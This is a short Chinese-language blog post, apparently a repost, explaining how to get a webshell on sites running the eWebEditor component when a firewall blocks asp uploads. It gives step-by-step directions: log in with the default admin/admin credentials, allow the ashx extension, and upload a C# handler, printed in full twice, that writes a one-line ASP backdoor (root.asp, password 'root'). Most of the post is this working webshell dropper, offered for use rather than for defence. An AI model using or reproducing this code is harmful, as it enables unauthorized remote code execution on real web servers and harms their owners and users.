ewebeditor 上传遇到防火墙限制的解决办法 图文
程序员文章站
2022-04-30 21:38:43
今天看了前面的原创帖子说到eweb遇到asp,asa,cer被限制访问拿不了shell,正好这个问题我是知道的。应该很多大牛都会的吧,估计还是有些不会的,就将就看看吧... 11-05-10...
这是一个eweb入口(废话)
<%@ webhandler language="c#" class="handler" %>
using system;
using system.web;
using system.io;
public class handler : ihttphandler {
public void processrequest (httpcontext context) {
context.response.contenttype = "text/plain";
streamwriter file1= file.createtext(context.server.mappath("root.asp"));
file1.write("<%response.clear:execute request(\"root\"):response.end%>");
file1.flush();
file1.close();
}
public bool isreusable {
get {return false; }
}
}
然后直接访问它。。
用默认帐户密码admin admin进入
样式添加asa扩展名
直接上传asp马
到这里都是顺利的,但是。。当你访问马的时候。。
试过了小马,一句话,会出现同样的问题
解决方法:
在样式添加里加上扩展名ashx
创建一个1.ashx的文件, 上传,代码如下:
复制代码
代码如下:<%@ webhandler language="c#" class="handler" %>
using system;
using system.web;
using system.io;
public class handler : ihttphandler {
public void processrequest (httpcontext context) {
context.response.contenttype = "text/plain";
streamwriter file1= file.createtext(context.server.mappath("root.asp"));
file1.write("<%response.clear:execute request(\"root\"):response.end%>");
file1.flush();
file1.close();
}
public bool isreusable {
get {return false; }
}
}
它会在当前目录生成一个root.asp的一句话木马,密码为root
然后连接一句话木马就可以啦~~
拿到shell